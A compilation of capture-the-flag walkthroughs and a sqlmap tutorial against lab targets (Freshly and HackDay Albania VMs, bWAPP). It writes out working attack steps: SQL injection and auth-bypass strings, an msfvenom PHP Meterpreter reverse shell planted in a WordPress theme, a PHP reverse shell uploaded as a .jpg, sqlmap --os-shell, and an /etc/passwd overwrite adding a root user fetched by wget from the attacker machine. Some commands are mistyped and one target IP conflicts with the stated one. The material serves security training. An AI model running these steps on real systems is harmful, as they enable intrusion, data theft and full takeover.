Hack the Freshly VM (CTF Challenge)

Here we come with a new article which will all be about a penetration testing challenge called FRESHLY. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. It’s an easy lab… let’s get started with it and access it.

Download from here

https://www.vulnhub.com/?q=fresh&sort=date-asc&type=vm

Breaching Methodology

·         Network Scanning (Nmap)

·         Recon (Nikto)

·         Login Form Based SQL Injection

·         Abusing wordpress

·         Generate PHP Backdoor (Msfvenom)

·         Upload and execute a backdoor

·         Reverse connection (Metasploit)

·         Take root access

Let’s Start!!

So to start with it firstly we have to find out the IP of FRESHLY. For that type the netdiscover command in terminal of Kali. It will show each IP present in our network.

Now we have target IP: 192.168.1.112 so let’s scan it with aggressive scan (-A).

nmap -p-  -A 192.168.1.112

This shows all open ports: 80, 8080, 443.

As we can see 80 port is open so we will open target IP in our browser to find out what’s in there as our next clue.

Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type: nikto -h [host URL.

After scanning it shows that there is a login.php page found. So open it in a browser with target IP

Since we don’t know the exact username and password therefore we have used SQLMAP for login form based injection for retrieving the database name and login credential by executing following command.

sqlmap -u http://192.168.1.6/login.php ‘’ --form –risk 3 --level 3 –dbs

From sqlmap result we came to that the name of database could be“wordpress8080”, so now using sqlmap again fetch username and password from that database i.e. wordpress8080

Alright we have achieved our first step by finding out user and password for wordpress.

User = admin

Password = SuperSecretPassword

 Earlier we have already found out our open ports so use one of not used ports to open in browser ie.8080

Cool…See what you have got…. Now click on this link and you are all set for further result.

Candy goodness!!!!!  It’s our wordpress page. So let’s get on to other step by opening wordpress login page and entering the credentials we found out i.e.

User= admin

Password= SuperSecretPassword

Once you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenom command:

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 –f raw

Side by side in other terminal open metasploit and run multi handler.

From generated php raw file copy the code from  to die(). As we want to read a file on the system, let’s put some PHP code in the theme: We go to Appearance -> themes -> 404.php and add some PHP code in order to execute it,

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.108

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session1, now start penetrating for accessing root privilege. Then to access proper TTY shell we had import python one line script by typing following:

python -c 'import pty;pty.spawn("/bin/bash")'

For getting root access, account credential reuse from the WordPress admin password SuperSecretPassword that allowed su – to escalate privileges.

Database Penetration Testing using Sqlmap

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Ø  Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.

Ø  Enumerate users, password hashes, privileges, roles, databases, tables and columns.

Ø  Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.

Ø  Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.

Ø  Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

For more details visit their official site sqlmap.org

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here now open the bWAPP in your pc and login with following credentials:

Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.101:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.

Type any name of movie in the text field and just after that start the burp suite in kali Linux.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to submit. Use intercepted data within sqlmap commands.

Open the terminal in kali Linux and type the sqlmap command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs

This tool will now analysis the url for making connection from target and then use sql queries in given cookies for sql injection attack and fetch all names of database. So if you notice image given below we have caught all name of database. Choose any name for fetching more details.

I am interested in bwapp so that I could fetch all table under bwapp therefore I will type following command on terminal.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –dbs –D bwapp –tables

Here we have got 5 tables name which are: blog, heroes, movies, users, visitors.

Now if you want to penetrate more about table use the following command for each and every table.

I want to know columns details of blog table using above as I have got it as you can see in image given below.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –dbs –D bwapp –T blog --columns

This command fetches all columns of blog table. It shows there are 4 columns with their data types.

To know more about blog table now I will seek its column from inside using following command which will dump all field inside blog’s columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp –T blog –C date,entry,id,owner –dump

Blog table appears to be empty as all fields are left blank.

I want to know columns details of users table.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –dbs –D bwapp –T users –columns

We have got all columns of users table with their data types.

Again I will seek its column from inside use the following command which will now dump all fields inside user’s columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –D bwapp –T users –C id,emails,login,password,secret –dump

Here I founds only two entries as you see sqlmap has dump only those column which I have mentioned in command not the whole table.

Repeat the whole process again for table movies.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –D bwapp –T movies –columns

In same way this tool has fetched all columns with their data types under movie table.

Again I want to penetrate its column so I will use same command by modifying its table name.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –D bwapp –T movies –C genre,id,imdb,main_character,release_year,tickets_stock,title --dump

Wow!! Their are10 entries as if you will see this tool have again dump all data for which I had made request.

Once again repeat the whole process for table heroes.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" –D bwapp –T heroes --columns

We have 4 columns with their data types.

For more information repeat the process which will dump details under its columns.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T heroes -C id,login,password,secret --dump

We have got id, login, password and secret entries. Read the details from table.

Again repeat the same process for our last table which is visitors.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T visitors –columns

Table visitors are also having 4 columns with its data types.

Let’s penetrate its columns also

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp -T visitors -C date,id,ip_address,user_agent –dump

Cool!!! Like blog table it is also left blank. But the task is not ended here the more interesting things begins now.

We have traverse each and every table completely but more important than to fetch details of tables is to gain access of os-shell for any web server.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" -D bwapp --os-shell

Above command will try to generate a backdoor; type 4 for PHP payload and type 1 for common location to use as writable directory.

Awesome!!!  We got the shell.

os-shell> net users

Hack the Hackday Albania VM (CTF Challenge)

Hello friends!! Today we are going to solve another CTF challenge “HackDay-Albania” which is presented by Vulnhub.com and designed by R-73eN for the beginners who want to practice OSCP lab challenges. You can download it from here: https://www.vulnhub.com/entry/hackday-albania,167/

Level: beginner to intermediate

Task: Boot to Root

Penetration Methodologies

·         Network Scanning (Nmap, Netdiscover)

·         Use Robot.txt

·         Apply SQL Injection

·         Upload PHP reverse Shell

·         Get netcat session

·         Edit etc/passwd file

·         Get Root access and capture the Flag

Walkthrough

First step is as always, running netdiscover on the VM to grab the IP address. In my case the IP was 192.168.1.127.

Once the IP was found, we ran nmap aggressive scan to enumerate all the open ports.

nmap -A 192.168.1.127

Here you can observer that port 22 and 8008 are opened, also you can observe there is robot.txt file in which 15 entries are allowed and 26 are disallowed.

Nmap result shows that our target is running http on port no.8008. So, we fire up our browser targeting. The message in the box translates to- “if I am, I know where to go :)”

We try for some hint in the page-source and find a comment at the bottom “Ok ok, but not here.

Then I try some of entries of the robot.txt list which I found from Nmap scanning result and fortunately by exploring /unisxcudkqjydw/ in the browser I got another directory name “/vulnbank/”.

So again I explore a new URL in that browser and found a client folder from inside the Index page,

http://192.168.1.127:8008/unisxcudkqjydw/vulnbank/

Clicking on the /client directory, we are greeted by a login page of very secure bank But we don’t have login credential.

Therefore, I try SQL injections for username and password and luckily following parameters get matched.

Username: ‘ or ‘a’ = ‘a’ --

Password: #

And it opened up like a beautiful treasure! As you can see, according this web page “contact Support” here we can attached our file and can discuss our problem.

So, here is what we did.

Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php

Open it with text editor and add listening IP and port and save this file as php-reverse-shell.jpg and start netcat at listening port.

Then uploaded our PHP shell and execute to get reverse connection at netcat.

nc -lvp 1234

From given below image you can observe netcat session. But the task is not finished yet, still, we need to penetrate more for privilege escalation. Then to access proper TTY shell we had import python one line script by typing following:

python -c 'import pty;pty.spawn("/bin/bash")'

Then I check permission for passwd file and found that the file is writable.

ls -al /etc/passwd

So I open the file with cat command and select the copied whole content into a text file.

cat /etc/passwd

In a new terminal we are using openssl to make a new password hash combined salt value and password in MD5 algorithm. For this the below command is used:

openssl passwd -1 -salt ignite pass123

Now copy this salt password and then open the text file where you copied /etc/passwd content.

Then we create a new entry for user “raj” and past above salt password. Also set UID and GID 0:0 for him to add him into root group member and save file as passwd on the desktop. Now we have to transfer this file into victim’s machine so that we can replace it from original passwd file. Now run the web server on the Kali machine:

python -m SimpleHTTPServer 80

Now download the newly modify passwd file inside /tmp directory and then copy the downloaded file into /etc/passwrd which will overwrite the content of original passwd file.

cd /tmp

wget http://192.168.1.128/passwd

cp passwd /etc/passwd

When you have done above said steps then switch to your new user and try to gain root access.

su raj

cd /root

ls

cat flag.txt

Wonderful!! We have gained access and capture the flag.